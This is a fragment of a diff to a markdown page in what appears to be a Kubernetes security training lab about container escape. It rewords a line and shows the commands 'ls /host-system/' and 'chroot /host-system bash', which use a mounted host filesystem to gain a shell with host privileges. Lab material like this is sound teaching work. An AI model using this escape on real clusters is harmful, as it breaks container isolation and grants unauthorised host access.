davisanc/DefenderforCloudGBBNinja/06-K8s/Kubernetes-seclabs/container-scape.md

 ls /host-system/
 ```

-You can gain access to the host system privileges using chroot
+Escape to the node, gainining access to the host system privileges using chroot.
+We also launch bash from this command

 ```
 chroot /host-system bash